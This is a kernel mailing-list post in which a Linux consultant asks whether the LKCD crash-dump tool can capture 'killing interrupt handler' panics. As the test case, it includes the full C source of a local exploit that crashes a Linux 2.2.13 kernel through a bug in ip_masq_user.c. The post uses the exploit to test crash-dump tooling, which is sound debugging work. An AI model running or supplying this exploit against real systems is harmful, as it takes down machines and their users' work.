Today there was a post on the kernel list of a snippet of C code to crash to
2.2.13 kernel via an ip_masq exploit. After modifying this to compile (header
names were slightly different for some reason), I ran it to test lkcd. The
system crashed so fast I could barely see what went on. Looked like several
oopses scrolled by, then the dreaded "killing interrupt handler" message. No
crash dump was generated. I have successfully created crash dumps on this
system via the tests described in the FAQ.
My question is, will or can this be fixed in a future version of lkcd? I don't
mean specifically relative to this crash case, but in the general "killing
interrupt handler" case. Mission Critical Linux claimed they were going to fix
this same type of problem in a future version of their crash patch. As of now
they are about three weeks overdue on that.
The code:
/* crash 2.2.13 kernel exploiting a bug in ip_masq_user.c (c)djsf */
#include <stdio.h>
#include <linux/types.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/ip.h>
/*
#include <netinet/ip_tcp.h>
#include <netinet/ip_udp.h>
*/
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <linux/ip_fw.h>
#include <linux/ip_masq.h>
int main()
{
int sock;
struct ip_masq_ctl mctl;
memset (&mctl, 0, sizeof (mctl));
mctl.m_target = IP_MASQ_TARGET_USER; mctl.m_cmd = IP_MASQ_CMD_DEL;
mctl.u.user.protocol = IPPROTO_UDP;
if ((sock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
perror ("socket"); exit (1);
}
if (setsockopt (sock, IPPROTO_IP, IP_FW_MASQ_CTL, &mctl, sizeof (mctl)))
perror ("kab00m failed :) ");
exit (0);
}
--
Brian Hall <brianw.hall@xxxxxxxxxx>
Linux Consultant
|